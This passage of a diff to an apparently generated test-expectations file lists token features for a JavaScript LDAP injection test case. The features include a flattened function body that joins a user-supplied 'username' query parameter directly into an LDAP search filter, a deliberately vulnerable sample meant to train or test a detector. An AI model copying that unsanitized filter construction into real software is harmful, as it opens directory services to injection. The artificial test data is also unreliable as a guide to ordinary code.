o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:7:22:33 | usernam ... sername | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:7:22:33 | usernam ... sername | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:7:22:33 | username | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:7:22:33 | username | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:7:22:33 | username | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:7:22:33 | username | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:7:22:33 | username | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:18:22:18 | q | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:18:22:18 | q | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:18:22:18 | q | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:18:22:18 | q | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:18:22:18 | q | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:18:22:24 | q.query | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:18:22:24 | q.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:18:22:24 | q.query | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:18:22:24 | q.query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:18:22:24 | q.query | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:18:22:33 | q.query.username | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:18:22:33 | q.query.username | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:18:22:33 | q.query.username | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:18:22:33 | q.query.username | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:18:22:33 | q.query.username | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:20:22:24 | query | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:20:22:24 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:20:22:24 | query | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:20:22:24 | query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:20:22:24 | query | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:26:22:33 | username | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:26:22:33 | username | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:26:22:33 | username | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:26:22:33 | username | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:22:26:22:33 | username | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:24:7:24:11 | opts1 | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:24:7:24:11 | opts1 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:24:7:24:11 | opts1 | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:24:7:24:11 | opts1 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:24:7:24:11 | opts1 | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:24:7:26:3 | opts1 | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:24:7:26:3 | opts1 | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:24:7:26:3 | opts1 | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:24:7:26:3 | opts1 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:24:7:26:3 | opts1 | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:24:7:26:3 | opts1 = ... )`,\\n } | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:24:7:26:3 | opts1 = ... )`,\\n } | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:24:7:26:3 | opts1 = ... )`,\\n } | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:24:7:26:3 | opts1 = ... )`,\\n } | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:24:7:26:3 | opts1 = ... )`,\\n } | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:24:15:26:3 | {\\n f ... )`,\\n } | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:24:15:26:3 | {\\n f ... )`,\\n } | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:24:15:26:3 | {\\n f ... )`,\\n } | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:24:15:26:3 | {\\n f ... )`,\\n } | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:24:15:26:3 | {\\n f ... )`,\\n } | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:5:25:10 | filter | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:5:25:10 | filter | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:5:25:10 | filter | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:5:25:10 | filter | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:5:25:10 | filter | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:5:25:57 | filter: ... ame}))` | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:5:25:57 | filter: ... ame}))` | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:5:25:57 | filter: ... ame}))` | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:5:25:57 | filter: ... ame}))` | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:5:25:57 | filter: ... ame}))` | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:5:25:57 | filter: ... ame}))` | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:5:25:57 | filter: ... ame}))` | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:5:25:57 | filter: ... ame}))` | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:5:25:57 | filter: ... ame}))` | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:5:25:57 | filter: ... ame}))` | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:13:25:57 | `(\|(nam ... ame}))` | assignedToPropName | filter | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:13:25:57 | `(\|(nam ... ame}))` | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:13:25:57 | `(\|(nam ... ame}))` | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:13:25:57 | `(\|(nam ... ame}))` | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:13:25:57 | `(\|(nam ... ame}))` | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:13:25:57 | `(\|(nam ... ame}))` | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:14:25:21 | (\|(name= | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:14:25:21 | (\|(name= | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:14:25:21 | (\|(name= | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:14:25:21 | (\|(name= | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:14:25:21 | (\|(name= | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:14:25:21 | (\|(name= | stringConcatenatedWith | -endpoint- username + ')(username=' + username + '))' | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:24:25:31 | username | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:24:25:31 | username | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:24:25:31 | username | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:24:25:31 | username | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:24:25:31 | username | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:24:25:31 | username | stringConcatenatedWith | '(\|(name=' -endpoint- ')(username=' + username + '))' | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:33:25:43 | )(username= | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:33:25:43 | )(username= | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:33:25:43 | )(username= | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:33:25:43 | )(username= | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:33:25:43 | )(username= | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:33:25:43 | )(username= | stringConcatenatedWith | '(\|(name=' + username -endpoint- username + '))' | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:46:25:53 | username | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:46:25:53 | username | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:46:25:53 | username | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:46:25:53 | username | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:46:25:53 | username | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:46:25:53 | username | stringConcatenatedWith | '(\|(name=' + username + ')(username=' -endpoint- '))' | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:55:25:56 | )) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:55:25:56 | )) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:55:25:56 | )) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:55:25:56 | )) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:55:25:56 | )) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:25:55:25:56 | )) | stringConcatenatedWith | '(\|(name=' + username + ')(username=' + username -endpoint- | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:3:28:8 | client | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:3:28:8 | client | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:3:28:8 | client | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:3:28:8 | client | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:3:28:8 | client | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:3:28:15 | client.search | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:3:28:15 | client.search | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:3:28:15 | client.search | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:3:28:15 | client.search | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:3:28:15 | client.search | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:3:28:59 | client. ... es) {}) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:3:28:59 | client. ... es) {}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:3:28:59 | client. ... es) {}) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:3:28:59 | client. ... es) {}) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:3:28:59 | client. ... es) {}) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:3:28:59 | exceptional return of client. ... es) {}) | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:3:28:59 | exceptional return of client. ... es) {}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:3:28:59 | exceptional return of client. ... es) {}) | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:3:28:59 | exceptional return of client. ... es) {}) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:3:28:59 | exceptional return of client. ... es) {}) | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:10:28:15 | search | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:10:28:15 | search | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:10:28:15 | search | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:10:28:15 | search | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:10:28:15 | search | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:17:28:27 | "o=example" | CalleeFlexibleAccessPath | client.search | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:17:28:27 | "o=example" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:17:28:27 | "o=example" | calleeImports | ldapjs | @@ -1008,6 +5499,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:30:28:34 | opts1 | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:30:28:34 | opts1 | fileImports | http ldapjs url | | autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:30:28:34 | opts1 | receiverName | client | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:37:28:36 | this | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:37:28:36 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:37:28:36 | this | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:37:28:36 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:37:28:36 | this | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:37:28:58 | 'arguments' object of anonymous function | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:37:28:58 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:37:28:58 | 'arguments' object of anonymous function | enclosingFunctionBody | req res q url parse req url true username q query username opts1 filter (\|(name= username )(username= username )) client search o=example opts1 err res client search o=example filter (\|(name= username )(username= username )) err res client search o=example filter (\|(name= sanitizeInput username )(username= sanitizeInput username )) err res f OrFilter filters EqualityFilter attribute name value username EqualityFilter attribute username value username client search o=example filter f err res parsedFilter ldap parseFilter (\|(name= username )(username= username )) client search o=example filter parsedFilter err res dn ldap parseDN cn= username err dn | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:37:28:58 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:37:28:58 | 'arguments' object of anonymous function | fileImports | http ldapjs url | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:37:28:58 | exceptional return of anonymous function | contextFunctionInterfaces | sanitizeInput(input) | +| autogenerated/NosqlAndSqlInjection/untyped/ldap.js:28:37:28:58 | 